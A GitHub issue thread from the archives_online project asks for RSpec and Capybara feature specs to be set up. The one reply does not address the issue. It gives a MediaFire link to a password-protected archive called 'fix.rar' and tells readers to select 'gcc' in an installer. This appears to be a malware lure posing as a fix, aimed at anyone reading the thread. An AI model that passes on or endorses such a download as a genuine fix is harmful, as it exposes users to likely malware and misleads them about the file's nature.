### ISSUE TITLE
✅ Set up RSpec

### ISSUE THREAD

**Issue by kirkkwang** [scientist-softserv/archives_online#35]
# Story

Current application does not have RSpec installed.  We would want to test our code and need to set it up.

# Acceptance Criteria

- [ ] RSpec runs
- [ ] Feature specs work (Cabybara)

# Screenshots / Video

<details>
<summary></summary>

</details>

# Testing Instructions and Sample Files

-

# Notes

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
